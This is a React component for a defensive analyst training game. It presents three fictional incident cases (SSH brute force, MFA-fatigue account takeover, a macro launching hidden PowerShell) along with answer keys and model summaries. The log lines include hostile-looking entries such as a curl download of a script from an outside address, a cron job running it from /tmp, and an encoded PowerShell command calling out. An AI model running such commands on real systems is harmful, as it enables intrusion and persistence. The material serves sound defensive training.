import { useState } from 'react';
import { useLS } from './hooks';
type C = { id: string; t: string; lines: string[]; bad: number[]; sev: number; techs: string[]; tech: number; acts: string[]; act: number; sum: string };
const SEV = ['Low', 'Medium', 'High', 'Critical'];
const CS: C[] = [
  { id: 'c1', t: 'CASE #001: failed logins, then a success', lines: ['09:12:01 sshd: Failed password for admin from 203.0.113.45', '09:12:03 sshd: Failed password for admin from 203.0.113.45', '09:12:05 sshd: Failed password for root from 203.0.113.45', '09:12:08 sshd: Failed password for ubuntu from 203.0.113.45', '09:12:11 sshd: Failed password for admin from 203.0.113.45', '09:13:40 sshd: Accepted password for sara from 192.0.2.10', '09:14:02 sshd: Accepted password for admin from 203.0.113.45', '09:14:30 sudo: admin ran curl http://198.51.100.9/x.sh', '09:15:12 cron: (admin) CMD (/tmp/.x/run.sh)', '09:20:45 sshd: Accepted publickey for deploy from 192.0.2.25'], bad: [0, 1, 2, 3, 4, 6, 7, 8], sev: 2, techs: ['Brute Force (T1110)', 'Phishing (T1566)', 'Exploit Public-Facing Application (T1190)'], tech: 0, acts: ['Isolate the host, disable the account and reset credentials', 'Wait for more logs', 'Reboot the server'], act: 0, sum: 'At 09:12 one external address (203.0.113.45) made repeated failed SSH logins against several accounts, then logged in as admin at 09:14. The account then fetched a script and a cron job was set to run it from /tmp, which is persistence. Likely a successful brute force followed by compromise. Severity High. Isolate the host, disable and reset the admin account, collect evidence, block the IP and check other systems for the same address.' },
  { id: 'c2', t: 'CASE #002: sign-ins that do not add up', lines: ['08:02 sign-in maya ip=192.0.2.44 city=Casablanca result=success mfa=passed', '08:05 sign-in maya ip=192.0.2.44 city=Casablanca result=success mfa=passed', '08:31 sign-in maya ip=198.51.100.77 city=Sao Paulo result=success mfa=approved after 5 prompts', '08:33 mailbox rule created for maya: forward all mail to an external address', '08:34 sign-in ali ip=192.0.2.45 city=Casablanca result=success mfa=passed', '08:40 download of 480 files from SharePoint by maya ip=198.51.100.77'], bad: [2, 3, 5], sev: 2, techs: ['MFA Request Generation (T1621)', 'SQL injection', 'Brute Force (T1110)'], tech: 0, acts: ['Revoke sessions, reset password and MFA, remove the forwarding rule', 'Ignore it: MFA passed', 'Delete the mailbox'], act: 0, sum: 'Maya signed in from Casablanca at 08:05 and from Sao Paulo 26 minutes later, which is impossible travel. The second login only succeeded after five MFA prompts, a sign of MFA fatigue. A forwarding rule and a mass download followed. This is an account takeover with data exposure. Severity High. Revoke sessions, reset credentials and MFA, remove the rule, review which files were accessed and notify the data owner.' },
  { id: 'c3', t: 'CASE #003: Office starts a shell', lines: ['10:01 explorer.exe started winword.exe (user=lee) file=Invoice_4471.docm', '10:01 winword.exe started powershell.exe -nop -w hidden -enc [long encoded string]', '10:02 powershell.exe connected to 198.51.100.200:443', '10:02 powershell.exe created scheduled task "Updater" running C:\\Users\\lee\\AppData\\Roaming\\u.ps1', '10:15 chrome.exe started by lee (normal browsing)', '10:20 backup agent completed job nightly-files'], bad: [0, 1, 2, 3], sev: 2, techs: ['PowerShell (T1059.001)', 'Brute Force (T1110)', 'SQL injection'], tech: 0, acts: ['Isolate the workstation, preserve the script and memory, reset the user credentials', 'Close Word and carry on', 'Reinstall Office only'], act: 0, sum: 'A macro document opened in Word started a hidden PowerShell with an encoded command, which connected out and created a scheduled task: execution, command and control, and persistence. Office launching a shell is a strong detection signal. Severity High. Isolate the workstation, preserve the script and memory, reset the user credentials, block the destination and hunt for the same document elsewhere.' }];
function Case({ c, onBest }: { c: C; onBest: (n: number) => void }) {
  const [sel, setSel] = useState<number[]>([]); const [sev, setSev] = useState(-1); const [tech, setTech] = useState(-1); const [act, setAct] = useState(-1); const [r, setR] = useState<{ hit: number; fp: number; miss: number; total: number } | null>(null);
  const go = () => { const hit = sel.filter(i => c.bad.includes(i)).length; const fp = sel.length - hit; const total = Math.max(0, hit - fp) + (sev === c.sev ? 2 : 0) + (tech === c.tech ? 2 : 0) + (act === c.act ? 2 : 0); setR({ hit, fp, miss: c.bad.length - hit, total }); onBest(total); };
  const sl = (v: number, f: (n: number) => void, o: string[], id: string) => <select id={id} value={v} disabled={!!r} onChange={e => f(+e.target.value)}><option value={-1}>Choose...</option>{o.map((x, i) => <option key={x} value={i}>{x}</option>)}</select>;
  const ok = (b: boolean, a: string) => b ? 'Correct.' : 'Expected: ' + a + '.';
  return (<><h3>{c.t}</h3><p><b>1.</b> Tick every suspicious line. Addresses use documentation ranges and the data is fictional.</p>
    <div className="lg">{c.lines.map((l, i) => <label key={i}><input type="checkbox" disabled={!!r} checked={sel.includes(i)} onChange={() => setSel(sel.includes(i) ? sel.filter(x => x !== i) : [...sel, i])} />{l}</label>)}</div>
    <label htmlFor={c.id + 's'}><b>2.</b> Severity</label>{sl(sev, setSev, SEV, c.id + 's')}<label htmlFor={c.id + 't'}><b>3.</b> Which technique explains the activity?</label>{sl(tech, setTech, c.techs, c.id + 't')}<label htmlFor={c.id + 'a'}><b>4.</b> Best first response</label>{sl(act, setAct, c.acts, c.id + 'a')}
    {!r && <p><button className="btn p" disabled={sev < 0 || tech < 0 || act < 0} onClick={go}>Submit analysis</button></p>}
    {r && <div className="card" style={{ marginTop: 14 }} aria-live="polite"><h3>Score {r.total} / {c.bad.length + 6}</h3><p>Suspicious lines: {r.hit} found, {r.miss} missed, {r.fp} false positives.</p><p>Severity: {ok(sev === c.sev, SEV[c.sev])} Technique: {ok(tech === c.tech, c.techs[c.tech])} Response: {ok(act === c.act, c.acts[c.act])}</p><p><b>Model incident summary:</b> {c.sum}</p></div>}</>);
}
export default function SocCase() {
  const [k, setK] = useState(0); const [n, setN] = useState(0); const [rec, setRec] = useLS<Record<string, number>>('sc', {}); const c = CS[k];
  return (<><h2>SOC case files</h2><p className="lead">Work like a Tier 1 analyst: read the logs, spot what does not belong, rate the severity, name the technique and recommend the first response. Cases are fictional.</p>
    <div className="row">{CS.map((x, i) => <button key={x.id} aria-pressed={k === i} onClick={() => { setK(i); setN(n + 1); }}>{x.t.split(':')[0]}{rec[x.id] !== undefined ? ' (best ' + rec[x.id] + ')' : ''}</button>)}</div>
    <Case key={k + '-' + n} c={c} onBest={s => setRec({ ...rec, [c.id]: Math.max(rec[c.id] || 0, s) })} />
    <p><button className="btn" onClick={() => setN(n + 1)}>Retry this case</button></p></>);
}
